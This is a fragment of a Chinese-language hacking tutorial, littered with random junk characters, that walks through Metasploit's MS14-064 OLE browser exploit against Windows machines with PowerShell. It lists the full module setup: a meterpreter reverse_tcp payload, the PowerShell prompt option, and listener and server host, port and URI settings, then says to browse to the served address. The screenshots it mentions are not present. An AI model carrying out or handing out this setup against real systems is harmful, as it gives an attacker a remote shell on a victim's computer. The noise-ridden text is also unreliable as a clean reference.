' U5 a6 u; \( Z$ T& ?% r0 X
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
5 |: ^6 ]5 o+ z6 o6 {4 x9 v
5 S* j" d. P) c1 Z9 K
$ k; b3 y6 p' c. d0 s3 e 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( _4 b$ V @/ k" S& |
: { c, w) o0 w# T7 C q& j
, m8 y1 a3 v6 o% m, E$ E 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp8 B( u$ l7 h0 K$ B; z1 ^
6 L$ L& g3 ^0 D# [& Y, F1 b- ]% I' T8 `
set AllowPowershellPrompt true
! E# l+ c; P) r8 @. y' o
. J' @) Y" r# }) f8 J8 n$ w4 U# g6 M
Set LHOST 192.168.0.109
2 u1 n- Z- V' V( Y% G
4 E! W" w7 h! q6 T+ }1 V; z+ x$ G( ~2 F: z6 C
set SRVHOST 192.168.0.109/ I/ J0 d6 h% }# D
/ _- m% @: I1 t( f8 K# z) x
' z2 A# i) a2 E4 X' | Set uripath share
: i6 |9 N: l7 ]/ t4 e
6 H4 v4 m7 H# b# V. ]1 U
. R6 v* ]2 _$ F: ~/ O# M Set srvport 80
% _4 h/ q. K6 r# Q/ W6 N
7 i( _9 y8 x( L. d/ ?( g# b. ?
3 l6 U( x2 K% _. m2 y, z
' _5 z# O' O9 ?! r
1 g `4 i5 w$ N4 r/ D
$ {9 h( e( i$ W* g, ]6 i1 q
+ ^& y6 }) w; @8 @) N) T1 Y
2 B" ?' S) C% q1 u* h! ^3 w2 \9 z- ^
* B# a; G" ^9 y$ M0 l( a' `$ N5 [' D5 C
; ~% ]+ |8 h; f l$ z2 ?" i
; r; x! M( q O2 s$ [8 v
; I7 Q/ j0 @9 v4 w: A m
! m/ }7 D& S% h" W) U
* V1 a8 d3 K$ q' Z3 X
" [! R9 f+ S" i- q: N
+ i$ k7 f* [: s" ^, o, n
1 e4 g' q" U) y/ `& d
1 Q9 J# I, w7 z6 B( u 下面我们来访问本地地址如图:; P1 {9 q9 \6 h9 o+ p' W
. Y1 \- z+ t" z& D/ ]
% F& q4 g, }% ?, V" u; }
9 ^& ~5 H5 \/ x' v6 I5 V, z
+ a6 l+ a+ [2 a- M) A# R
# s1 v- y! J9 Y. T+ B6 }! j, l
7 z) Z5 b3 o( R( j3 O
) T! q/ r8 D$ H7 f& u' H# r ^
$ f' o% ?, I# ~6 B- ~* j7 f
6 L) ?8 O8 _8 o. |6 E( l6 T: u